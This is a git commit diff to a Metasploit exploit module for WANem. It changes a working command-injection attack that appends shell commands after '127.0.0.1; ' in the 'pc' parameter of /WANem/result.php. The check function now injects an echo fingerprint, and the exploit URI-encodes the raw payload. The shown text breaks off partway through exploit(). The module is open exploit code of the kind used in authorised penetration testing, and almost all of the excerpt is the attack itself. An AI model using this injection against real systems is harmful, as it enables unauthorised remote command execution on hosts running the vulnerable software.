check function test vulnerability + minor improvements

unstable
jvazquez-r7 2012-09-09 00:42:02 +02:00
parent f02659184a
commit 37c7f366f2
1 changed files with 21 additions and 11 deletions

View File

@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote
and vulnerable to command execution in argument one.
},
'License' => MSF_LICENSE,
'Version' => '$Revision: 1 $',
'Privileged' => true,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
@ -42,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
'BadChars' => "\x00\x22\x27",
'DisableNops' => true,
'Compat' =>
{
@ -68,24 +67,35 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
@peer = "#{rhost}:#{rport}"
fingerprint = Rex::Text.rand_text_alphanumeric(rand(8)+4)
data = "pc=127.0.0.1; "
data << Rex::Text.uri_encode("echo #{fingerprint}")
data << "%26"
print_status("#{@peer} - Sending check")
begin
res = send_request_cgi({
'method' => 'GET',
'uri' => '/WANem/result.php'
})
if res and res.body =~ /<br><br><br><b><font color=red>Can't measure\!\! Please repeat\.<\/font><\/b><\/body>/
return Exploit::CheckCode::Appears
'uri' => '/WANem/result.php',
'method' => 'POST',
'data' => data
}, 25)
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("#{@peer} - Connection failed")
return Exploit::CheckCode::Unknown
end
if res and res.code == 200 and res.body =~ /#{fingerprint}/
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
end
def exploit
@peer = "#{rhost}:#{rport}"
data = "pc=127.0.0.1; "
data << URI.encode(payload.raw)
data << Rex::Text.uri_encode(payload.raw)
data << "%26"
print_status("#{@peer} - Sending payload (#{payload.raw.length} bytes)")
begin